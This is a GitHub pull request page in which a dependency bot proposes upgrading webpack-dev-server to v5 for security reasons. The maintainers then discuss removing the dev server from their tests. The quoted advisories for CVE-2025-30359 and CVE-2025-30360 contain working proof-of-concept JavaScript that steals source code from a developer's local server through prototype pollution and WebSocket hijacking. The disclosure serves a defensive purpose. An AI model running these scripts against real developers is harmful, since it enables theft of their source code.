Skip to content

chore(deps): update dependency webpack-dev-server to v5 [security] - autoclosed #6103

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Closed
wants to merge 1 commit into from
Closed

chore(deps): update dependency webpack-dev-server to v5 [security] - autoclosed #6103

wants to merge 1 commit into from

Conversation

@renovate
Copy link
Contributor

@renovate renovate bot commented Nov 13, 2025
edited
Loading

This PR contains the following updates:

Package Change Age Confidence
webpack-dev-server ^4 -> ^5.2.1 age confidence

GitHub Vulnerability Alerts

CVE-2025-30359

Summary

Source code may be stolen when you access a malicious web site.

Details

Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:8080/main.js"> in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. Combined with prototype pollution, the attacker can get a reference to the webpack runtime variables.
By using Function::toString against the values in __webpack_modules__, the attacker can get the source code.

PoC

  1. Download reproduction.zip and extract it
  2. Run npm i
  3. Run npx webpack-dev-server
  4. Open https://e29c9a88-a242-4fb4-9e64-b24c9d29b35b.pages.dev/
  5. You can see the source code output in the document and the devtools console.

image

The script in the POC site is:

let moduleList
const onHandlerSet = (handler) => {
  console.log('h', handler)
  moduleList = handler.require.m
}

const originalArrayForEach = Array.prototype.forEach
Array.prototype.forEach = function forEach(callback, thisArg) {
  callback((handler) => {
    onHandlerSet(handler)
  })
  originalArrayForEach.call(this, callback, thisArg)
  Array.prototype.forEach = originalArrayForEach
}

const script = document.createElement('script')
script.src = 'http://localhost:8080/main.js'
script.addEventListener('load', () => {
  console.log(moduleList)
  for (const key in moduleList) {
    const p = document.createElement('p')
    const title = document.createElement('strong')
    title.textContent = key
    const code = document.createElement('code')
    code.textContent = moduleList[key].toString()
    p.append(title, ':', document.createElement('br'), code)
    document.body.appendChild(p)
  }
})
document.head.appendChild(script)

This script uses the function generated by renderRequire.

    // The require function
    function __webpack_require__(moduleId) {
        // Check if module is in cache
        var cachedModule = __webpack_module_cache__[moduleId];
        if (cachedModule !== undefined) {
            return cachedModule.exports;
        }
        // Create a new module (and put it into the cache)
        var module = __webpack_module_cache__[moduleId] = {
            // no module.id needed
            // no module.loaded needed
            exports: {}
        };
        // Execute the module function
        var execOptions = {
            id: moduleId,
            module: module,
            factory: __webpack_modules__[moduleId],
            require: __webpack_require__
        };
        __webpack_require__.i.forEach(function(handler) {
            handler(execOptions);
        });
        module = execOptions.module;
        execOptions.factory.call(module.exports, module, module.exports, execOptions.require);
        // Return the exports of the module
        return module.exports;
    }

Especially, it uses the fact that Array::forEach is called for __webpack_require__.i and execOptions contains __webpack_require__.
It uses prototype pollution against Array::forEach to extract __webpack_require__ reference.

Impact

This vulnerability can result in the source code to be stolen for users that uses a predictable port and output path for the entrypoint script.

Old content

Summary

Source code may be stolen when you use output.iife: false and access a malicious web site.

Details

When output.iife: false is set, some global variables for the webpack runtime are declared on the window object (e.g. __webpack_modules__).
Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:8080/main.js"> in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. By running that, the webpack runtime variables will be declared on the window object.
By using Function::toString against the values in __webpack_modules__, the attacker can get the source code.

I pointed out output.iife: false, but if there are other options that makes the webpack runtime variables to be declared on the window object, the same will apply for those cases.

PoC

  1. Download reproduction.zip and extract it
  2. Run npm i
  3. Run npx webpack-dev-server
  4. Open https://852aafa3-5f83-44da-9fc6-ea116d0e3035.pages.dev/
  5. Open the devtools console.
  6. You can see the content of src/index.js and other scripts loaded.

image

The script in the POC site is:

const script = document.createElement('script')
script.src = 'http://localhost:8080/main.js'
script.addEventListener('load', () => {
    for (const module in window.__webpack_modules__) {
        console.log(`${module}:`, window.__webpack_modules__[module].toString())
    }
})
document.head.appendChild(script)

Impact

This vulnerability can result in the source code to be stolen for users that has output.iife: false option set and uses a predictable port and output path for the entrypoint script.

CVE-2025-30360

Summary

Source code may be stolen when you access a malicious web site with non-Chromium based browser.

Details

The Origin header is checked to prevent Cross-site WebSocket hijacking from happening which was reported by CVE-2018-14732.
But webpack-dev-server always allows IP address Origin headers.
https://github.com/webpack/webpack-dev-server/blob/55220a800ba4e30dbde2d98785ecf4c80b32f711/lib/Server.js#L3113-L3127
This allows websites that are served on IP addresses to connect WebSocket.
By using the same method described in the article linked from CVE-2018-14732, the attacker get the source code.

related commit: webpack/webpack-dev-server@72efaab (note that checkHost function was only used for Host header to prevent DNS rebinding attacks so this change itself is fine.

This vulnerability does not affect Chrome 94+ (and other Chromium based browsers) users due to the non-HTTPS private access blocking feature.

PoC

  1. Download reproduction.zip and extract it
  2. Run npm i
  3. Run npx webpack-dev-server
  4. Open http://{ipaddress}/?target=http://localhost:8080&file=main with a non-Chromium browser (I used Firefox 134.0.1)
  5. Edit src/index.js in the extracted directory
  6. You can see the content of src/index.js

image

The script in the POC site is:

window.webpackHotUpdate = (...args) => {
    console.log(...args);
    for (i in args[1]) {
        document.body.innerText = args[1][i].toString() + document.body.innerText
	    console.log(args[1][i])
    }
}

let params = new URLSearchParams(window.location.search);
let target = new URL(params.get('target') || 'http://127.0.0.1:8080');
let file = params.get('file')
let wsProtocol = target.protocol === 'http:' ? 'ws' : 'wss';
let wsPort = target.port;
var currentHash = '';
var currentHash2 = '';
let wsTarget = `${wsProtocol}://${target.hostname}:${wsPort}/ws`;
ws = new WebSocket(wsTarget);
ws.onmessage = event => {
    console.log(event.data);
    if (event.data.match('"type":"ok"')) {
        s = document.createElement('script');
        s.src = `${target}${file}.${currentHash2}.hot-update.js`;
        document.body.appendChild(s)
    }
    r = event.data.match(/"([0-9a-f]{20})"/);
    if (r !== null) {
        currentHash2 = currentHash;
        currentHash = r[1];
        console.log(currentHash, currentHash2);
    }
}

Impact

This vulnerability can result in the source code to be stolen for users that uses a predictable port and uses a non-Chromium based browser.

Release Notes

webpack/webpack-dev-server (webpack-dev-server)

v5.2.1

Compare Source

Security
  • cross-origin requests are not allowed unless allowed by Access-Control-Allow-Origin header
  • requests with an IP addresses in the Origin header are not allowed to connect to WebSocket server unless configured by allowedHosts or it different from the Host header

The above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.

Bug Fixes
  • prevent overlay for errors caught by React error boundaries (#​5431) (8c1abc9)
  • take the first network found instead of the last one, this restores the same behavior as 5.0.4 (#​5411) (ffd0b86)

v5.2.0

Compare Source

Features
  • added getClientEntry and getClientHotEntry methods to get clients entries (dc642a8)
Bug Fixes
  • speed up initial client bundling (145b5d0)

v5.1.0

Compare Source

Features
  • add visual progress indicators (a8f40b7)
  • added the app option to be Function (by default only with connect compatibility frameworks) (3096148)
  • allow the server option to be Function (#​5275) (02a1c6d)
  • http2 support for connect and connect compatibility frameworks which support HTTP2 (#​5267) (6509a3f)
Bug Fixes
5.0.4 (2024-03-19)
Bug Fixes
5.0.3 (2024-03-12)
Bug Fixes
5.0.2 (2024-02-16)
Bug Fixes
5.0.1 (2024-02-13)
Bug Fixes

v5.0.4

Compare Source

Security
  • cross-origin requests are not allowed unless allowed by Access-Control-Allow-Origin header
  • requests with an IP addresses in the Origin header are not allowed to connect to WebSocket server unless configured by allowedHosts or it different from the Host header

The above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.

Bug Fixes
  • prevent overlay for errors caught by React error boundaries (#​5431) (8c1abc9)
  • take the first network found instead of the last one, this restores the same behavior as 5.0.4 (#​5411) (ffd0b86)

v5.0.3

Compare Source

Features
  • add visual progress indicators (a8f40b7)
  • added the app option to be Function (by default only with connect compatibility frameworks) (3096148)
  • allow the server option to be Function (#​5275) (02a1c6d)
  • http2 support for connect and connect compatibility frameworks which support HTTP2 (#​5267) (6509a3f)
Bug Fixes
5.0.4 (2024-03-19)
Bug Fixes
5.0.3 (2024-03-12)
Bug Fixes
5.0.2 (2024-02-16)
Bug Fixes
5.0.1 (2024-02-13)
Bug Fixes

v5.0.2

Compare Source

Features
  • add visual progress indicators (a8f40b7)
  • added the app option to be Function (by default only with connect compatibility frameworks) (3096148)
  • allow the server option to be Function (#​5275) (02a1c6d)
  • http2 support for connect and connect compatibility frameworks which support HTTP2 (#​5267) (6509a3f)
Bug Fixes
5.0.4 (2024-03-19)
Bug Fixes
5.0.3 (2024-03-12)
Bug Fixes
5.0.2 (2024-02-16)
Bug Fixes
5.0.1 (2024-02-13)
Bug Fixes

v5.0.1

Compare Source

Features
  • add visual progress indicators (a8f40b7)
  • added the app option to be Function (by default only with connect compatibility frameworks) (3096148)
  • allow the server option to be Function (#​5275) (02a1c6d)
  • http2 support for connect and connect compatibility frameworks which support HTTP2 (#​5267) (6509a3f)
Bug Fixes
5.0.4 (2024-03-19)
Bug Fixes
5.0.3 (2024-03-12)
Bug Fixes
5.0.2 (2024-02-16)
Bug Fixes
5.0.1 (2024-02-13)
Bug Fixes

v5.0.0

Compare Source

Features
  • add visual progress indicators (a8f40b7)
  • added the app option to be Function (by default only with connect compatibility frameworks) (3096148)
  • allow the server option to be Function (#​5275) (02a1c6d)
  • http2 support for connect and connect compatibility frameworks which support HTTP2 (#​5267) (6509a3f)
Bug Fixes
5.0.4 (2024-03-19)
Bug Fixes
5.0.3 (2024-03-12)
Bug Fixes
5.0.2 (2024-02-16)
Bug Fixes
5.0.1 (2024-02-13)
Bug Fixes

v4.15.2

Compare Source

4.15.2 (2024-03-20)
Bug Fixes
  • security: bump webpack-dev-middleware (4116209)

v4.15.1

Compare Source

Migration Guide and Changes.

4.15.1 (2023-06-09)
Bug Fixes

v4.15.0

Compare Source

Migration Guide and Changes.

4.15.1 (2023-06-09)
Bug Fixes

v4.14.0

Compare Source

Features
4.13.3 (2023-04-15)
Bug Fixes
4.13.2 (2023-03-31)
Bug Fixes
  • prevent open 0.0.0.0 in browser due windows problems (04e74f2)
4.13.1 (2023-03-18)
Bug Fixes

v4.13.3

Compare Source

Features
4.13.3 (2023-04-15)
Bug Fixes
4.13.2 (2023-03-31)
Bug Fixes
  • prevent open 0.0.0.0 in browser due windows problems (04e74f2)
4.13.1 (2023-03-18)
Bug Fixes

v4.13.2

Compare Source

Features
4.13.3 (2023-04-15)
Bug Fixes
4.13.2 (2023-03-31)
Bug Fixes
  • prevent open 0.0.0.0 in browser due windows problems (04e74f2)
4.13.1 (2023-03-18)
Bug Fixes

v4.13.1

Compare Source

Features
4.13.3 (2023-04-15)
Bug Fixes
4.13.2 (2023-03-31)
Bug Fixes
  • prevent open 0.0.0.0 in browser due windows problems (04e74f2)
4.13.1 (2023-03-18)
Bug Fixes

v4.13.0

Compare Source

Features
4.13.3 (2023-04-15)
Bug Fixes
4.13.2 (2023-03-31)
Bug Fixes
  • prevent open 0.0.0.0 in browser due windows problems (04e74f2)
4.13.1 (2023-03-18)
Bug Fixes

v4.12.0

Compare Source

Features
Bug Fixes
4.11.1 (2022-09-19)
Bug Fixes

v4.11.1

Compare Source

Features
Bug Fixes
4.11.1 (2022-09-19)
Bug Fixes

v4.11.0

Compare Source

Features
Bug Fixes
4.11.1 (2022-09-19)
Bug Fixes

v4.10.1

Compare Source

Features
  • make allowedHosts accept localhost subdomains by default (#​4357) (0a33e6a)
Bug Fixes
4.10.1 (2022-08-29)
Bug Fixes

v4.10.0

Compare Source

Features
  • make allowedHosts accept localhost subdomains by default (#​4357) (0a33e6a)
Bug Fixes
4.10.1 (2022-08-29)
Bug Fixes

v4.9.3

Compare Source

Features
  • allow to configure more client options via resource URL (#​4274) (216e3cb)
Bug Fixes
4.9.3 (2022-06-29)
Bug Fixes
  • avoid creation unnecessary stream for static sockjs file (#​4482) (049b153)
  • history-api-fallback now supports HEAD requests and handles them the same as GET (8936082)
4.9.2 (2022-06-06)
Bug Fixes
4.9.1 (2022-05-31)
Bug Fixes

v4.9.2

Compare Source

Features
  • allow to configure more client options via resource URL (#​4274) (216e3cb)
Bug Fixes
4.9.3 (2022-06-29)
Bug Fixes
  • avoid creation unnecessary stream for static sockjs file (#​4482) (049b153)
  • history-api-fallback now supports HEAD requests and handles them the same as GET (8936082)
4.9.2 (2022-06-06)
Bug Fixes
4.9.1 (2022-05-31)
Bug Fixes

v4.9.1

Compare Source

Features
  • allow to configure more client options via resource URL (#​4274) (216e3cb)
Bug Fixes
[4.9.3](https://redirect.gi

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate bot added the dependencies Pull requests that update a dependency file label Nov 13, 2025
@renovate renovate bot requested a review from a team as a code owner November 13, 2025 12:42
@renovate renovate bot added the dependencies Pull requests that update a dependency file label Nov 13, 2025
@renovate renovate bot force-pushed the renovate/npm-webpack-dev-server-vulnerability branch from af0310c to e96fe9c Compare November 13, 2025 12:43
@codecov
Copy link

codecov bot commented Nov 13, 2025
edited
Loading

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 95.16%. Comparing base (8c6e629) to head (ac1ec1d).
⚠️ Report is 1 commits behind head on main.

Additional details and impacted files 
@@           Coverage Diff           @@
##             main    #6103   +/-   ##
=======================================
  Coverage   95.16%   95.16%           
=======================================
  Files         316      316           
  Lines        9226     9226           
  Branches     2082     2082           
=======================================
  Hits         8780     8780           
  Misses        446      446
🚀 New features to boost your workflow:
  • ❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.
  • 📦 JS Bundle Analysis: Save yourself from yourself by tracking and limiting bundle sizes in JS merges.

@pichlermarc
Copy link
Member

pichlermarc commented Nov 13, 2025

We'll wait for the backport to webpack@4. It is only used in tests.
webpack/webpack-dev-server#5534

@pichlermarc
Copy link
Member

pichlermarc commented Nov 13, 2025
edited
Loading

We'll wait for the backport to webpack@4. It is only used in tests. webpack/webpack-dev-server#5534

Looks like the backport discussions did not progress very far, actually.

@renovate renovate bot force-pushed the renovate/npm-webpack-dev-server-vulnerability branch 2 times, most recently from 0bb2031 to 4ef5752 Compare November 13, 2025 13:22
@pichlermarc
Copy link
Member

pichlermarc commented Nov 13, 2025

cc @overbalance:

I guess given that the tests at the moment are mainly intended to be bundle tests ("does the bundle step work?"), we could remove the start script and the webpack-dev-server which would close this security ticket. I think I had added that start script initially as a way to just test if the setup I wrote actually works, but it does not serve any purpose other than local troubleshooting right now.

Does removing that sound okay to you?

@renovate renovate bot force-pushed the renovate/npm-webpack-dev-server-vulnerability branch 2 times, most recently from 6540fc2 to 0df0117 Compare November 13, 2025 23:40
@overbalance
Copy link
Contributor

overbalance commented Nov 14, 2025

@pichlermarc That sounds good. The build output is sufficient for our purposes.

@renovate renovate bot force-pushed the renovate/npm-webpack-dev-server-vulnerability branch 5 times, most recently from 553ce7f to 46d9f69 Compare November 17, 2025 16:16
@pichlermarc pichlermarc mentioned this pull request Nov 17, 2025
Merged
@renovate renovate bot force-pushed the renovate/npm-webpack-dev-server-vulnerability branch 4 times, most recently from edcf6c4 to 9095be8 Compare November 17, 2025 17:26
@renovate renovate bot force-pushed the renovate/npm-webpack-dev-server-vulnerability branch from 9095be8 to ac1ec1d Compare November 17, 2025 17:48
@renovate renovate bot changed the title chore(deps): update dependency webpack-dev-server to v5 [security] chore(deps): update dependency webpack-dev-server to v5 [security] - autoclosed Nov 17, 2025
@renovate renovate bot closed this Nov 17, 2025
@renovate renovate bot deleted the renovate/npm-webpack-dev-server-vulnerability branch November 17, 2025 17:55
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

@trentm trentm

@dyladan dyladan

@legendecas legendecas

@pichlermarc pichlermarc

Labels

dependencies Pull requests that update a dependency file

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

5 participants

@pichlermarc @overbalance @trentm @dyladan @legendecas